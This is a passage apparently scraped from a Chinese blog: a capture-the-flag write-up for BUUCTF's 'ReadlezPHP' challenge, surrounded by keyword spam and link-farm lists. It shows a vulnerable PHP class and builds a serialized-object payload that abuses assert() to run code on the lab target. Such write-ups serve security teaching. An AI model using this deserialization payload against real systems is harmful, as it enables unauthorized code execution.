当前位置: 首页 > wzjs >正文

给网站做网络安全的报价wordpress+社区

给网站做网络安全的报价,wordpress+社区,成都有什么好玩的地方 排行榜,wordpress最好用的采集插件BUUCTF——ReadlezPHP 进入靶场 看了看框架和源码信息 没有什么可以利用的地方 爆破一下目录看看 结果只出来个index.php 看了一下Findsomthing 报了个路径 /time.php?source拼接访问一下 出了个php代码 <?php #error_reporting(0); class HelloPhp {public $a;pub…

BUUCTF——ReadlezPHP

进入靶场

在这里插入图片描述

看了看框架和源码信息

没有什么可以利用的地方

爆破一下目录看看

在这里插入图片描述

结果只出来个index.php

看了一下Findsomthing

报了个路径

/time.php?source

在这里插入图片描述

拼接访问一下

在这里插入图片描述

出了个php代码

<?php
#error_reporting(0);
class HelloPhp
{public $a;public $b;public function __construct(){$this->a = "Y-m-d h:i:s";$this->b = "date";}public function __destruct(){$a = $this->a;$b = $this->b;echo $b($a);}
}
$c = new HelloPhp;if(isset($_GET['source']))
{highlight_file(__FILE__);die(0);
}@$ppp = unserialize($_GET["data"]);

代码结构分析

  1. 类定义 - HelloPhp 类:
    • 属性:
      • public $a
      • public $b
    • 构造函数 __construct():
      • 初始化 $this->a = "Y-m-d h:i:s" (日期格式字符串)
      • 初始化 $this->b = "date" (PHP日期函数名)
    • 析构函数 __destruct():
      • $this->a 赋值给 $a
      • $this->b 赋值给 $b
      • 执行 $b($a) 并输出结果 (动态函数调用)
  2. 实例化:
    • $c = new HelloPhp 创建了一个默认的 HelloPhp 对象
  3. 源代码查看功能:
    • 如果 GET 参数 source 存在,则显示当前文件源代码并退出
  4. 反序列化入口:
    • @$ppp = unserialize($_GET["data"]) 从 GET 参数 data 反序列化数据

构造反序列化payload

<?php
class HelloPhp
{public $a='phpinfo()';public $b='assert';}
$c = new HelloPhp;
echo(serialize($c));

在这里插入图片描述

拿到反序列化代码

构造payload

?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}

在这里插入图片描述

进入phpinfo 翻翻配置信息

翻到好东西了

在这里插入图片描述

flag{6fcec1e0-69df-46c7-a734-22b02c305449}

直接下播!!!

在这里插入图片描述


文章转载自:

http://8EAMPX1e.dkqyg.cn
http://8mcg64L9.dkqyg.cn
http://O2rtz0Q6.dkqyg.cn
http://YR70fXo9.dkqyg.cn
http://9PWNvo8I.dkqyg.cn
http://6zEo7fPG.dkqyg.cn
http://ulYjtWhm.dkqyg.cn
http://c0syMebq.dkqyg.cn
http://ROYYUtnL.dkqyg.cn
http://1XHJvysu.dkqyg.cn
http://AcCdHfes.dkqyg.cn
http://eCYnsy1m.dkqyg.cn
http://2TsN71Gd.dkqyg.cn
http://357aE3HG.dkqyg.cn
http://itPPh4fy.dkqyg.cn
http://LKg5hAc9.dkqyg.cn
http://IJKNUsq8.dkqyg.cn
http://olF371th.dkqyg.cn
http://1fZTtyBc.dkqyg.cn
http://7HnRufgQ.dkqyg.cn
http://N26XIUWz.dkqyg.cn
http://KZ8kjnlV.dkqyg.cn
http://QRK2rsen.dkqyg.cn
http://0T4Pwrok.dkqyg.cn
http://yrJFL35b.dkqyg.cn
http://PzQiCi6j.dkqyg.cn
http://0ETY7y36.dkqyg.cn
http://Uiuk9ZkQ.dkqyg.cn
http://IV51K13a.dkqyg.cn
http://6xvuulfa.dkqyg.cn
http://www.dtcms.com/wzjs/708965.html

相关文章:

  • 广州pc网站建设如何做网站规范
  • 郑州网站建设技术托管做视频网站需要什么样的配置
  • seo关键词优化提高网站排名正规的网站制作哪个好
  • wordpress 最新教程短视频入口seo
  • 阜宁县建设局网站网站了建设
  • 网站建设 答辩记录锚文本外链网站
  • 网站页面设计师制作动态表情的网站
  • 网站上怎么做企业推广广州本地新闻
  • 企业网站女生做网站主题有哪些
  • 网站建设方案书阿里云模板最近三天的新闻大事国内
  • 东大桥网站建设唐山海港开发区人才网
  • 网站扁平化布局管庄地区网站建设
  • 最简单的网站开发工具西安房产网签查询官网
  • 网站建设 天佩营销佛山手机网站建设优化
  • 网站免费源码大全无用下载东莞哪家网站建设专业
  • 网站关闭模板网站建设备案计划书
  • 地方网站收录洛阳微信网站建设
  • 国外优秀企业网站欣赏wordpress点击数
  • 网络服务与协议课件郑州百度关键词seo
  • 宁夏建设工程招投标管理中心网站网站收缩目录模板
  • 腾讯做的电子商务网站学校网站模板免费
  • 网站ip段屏蔽国家级示范建设网站
  • 怎样利用网站做推广网站解析后显示建设中
  • 货代可以从哪些网站开发客户软件商店应用
  • 网站卡密怎么做广西建设网查询
  • 北京梦创义网站建设本地app制作公司
  • 浙江综合网站建设配件怎么建网站数据库
  • 辽宁省建设厅证书查询网站wordpress添加导航
  • 专业网站建设费用电商网站建设开发的语言有哪些
  • 公司网站怎么申请怎么注册wordpress文章不显示全文